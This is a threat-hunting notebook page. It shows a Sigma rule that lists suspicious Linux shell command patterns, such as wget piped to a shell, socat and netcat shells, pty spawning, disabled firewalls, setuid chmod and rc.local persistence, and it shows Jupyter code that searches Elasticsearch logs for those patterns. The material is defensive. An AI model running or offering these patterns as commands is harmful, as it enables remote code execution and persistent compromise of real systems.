notebook.community

Edit and run

Suspicious Activity in Shell Commands

Detects suspicious shell commands used in various exploit codes (see references)

Rule Content

- title: Suspicious Activity in Shell Commands
  id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695
  description: Detects suspicious shell commands used in various exploit codes (see
    references)
  references:
  - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html
  - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb#L121
  - http://pastebin.com/FtygZ1cg
  - https://artkond.com/2017/03/23/pivoting-guide/
  author: Florian Roth
  date: 2017/08/21
  modified: 2019/02/05
  logsource:
    product: linux
    service: null
    category: null
  detection:
    keywords:
    - wget * - http* | perl
    - wget * - http* | sh
    - wget * - http* | bash
    - python -m SimpleHTTPServer
    - -m http.server
    - import pty; pty.spawn*
    - socat exec:*
    - socat -O /tmp/*
    - socat tcp-connect*
    - '*echo binary >>*'
    - '*wget *; chmod +x*'
    - '*wget *; chmod 777 *'
    - '*cd /tmp || cd /var/run || cd /mnt*'
    - '*stop;service iptables stop;*'
    - '*stop;SuSEfirewall2 stop;*'
    - chmod 777 2020*
    - '*>>/etc/rc.local'
    - '*base64 -d /tmp/*'
    - '* | base64 -d *'
    - '*/chmod u+s *'
    - '*chmod +s /tmp/*'
    - '*chmod u+s /tmp/*'
    - '* /tmp/haxhax*'
    - '* /tmp/ns_sploit*'
    - nc -l -p *
    - cp /bin/ksh *
    - cp /bin/sh *
    - '* /tmp/*.b64 *'
    - '*/tmp/ysocereal.jar*'
    - '*/tmp/x *'
    - '*; chmod +x /tmp/*'
    - '*;chmod +x /tmp/*'
    condition: keywords
  falsepositives:
  - Unknown
  level: high

Querying Elasticsearch

Import Libraries





In [ ]:



    


from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import pandas as pd

Initialize Elasticsearch client





In [ ]:



    


es = Elasticsearch(['http://helk-elasticsearch:9200'])
searchContext = Search(using=es, index='logs-*', doc_type='doc')

Run Elasticsearch Query





In [ ]:



    


s = searchContext.query('query_string', query='\*.keyword:(*wget\ *\ \-\ http*\ |\ perl* OR *wget\ *\ \-\ http*\ |\ sh* OR *wget\ *\ \-\ http*\ |\ bash* OR *python\ \-m\ SimpleHTTPServer* OR *\-m\ http.server* OR *import\ pty;\ pty.spawn* OR *socat\ exec\:* OR *socat\ \-O\ \/tmp\/* OR *socat\ tcp\-connect* OR *echo\ binary\ * OR *wget\ *;\ chmod\ \+x* OR *wget\ *;\ chmod\ 777\ * OR *cd\ \/tmp\ \||\ cd\ \/var\/run\ \||\ cd\ \/mnt* OR *stop;service\ iptables\ stop;* OR *stop;SuSEfirewall2\ stop;* OR *chmod\ 777\ 2020* OR *\/etc\/rc.local* OR *base64\ \-d\ \/tmp\/* OR *\ |\ base64\ \-d\ * OR *\/chmod\ u\+s\ * OR *chmod\ \+s\ \/tmp\/* OR *chmod\ u\+s\ \/tmp\/* OR *\ \/tmp\/haxhax* OR *\ \/tmp\/ns_sploit* OR *nc\ \-l\ \-p\ * OR *cp\ \/bin\/ksh\ * OR *cp\ \/bin\/sh\ * OR *\ \/tmp\/*.b64\ * OR *\/tmp\/ysocereal.jar* OR *\/tmp\/x\ * OR *;\ chmod\ \+x\ \/tmp\/* OR *;chmod\ \+x\ \/tmp\/*)')
response = s.execute()
if response.success():
    df = pd.DataFrame((d.to_dict() for d in s.scan()))

Show Results





In [ ]:



    


df.head()

Content source: Cyb3rWard0g/HELK

Similar notebooks:

notebook.community | gallery | about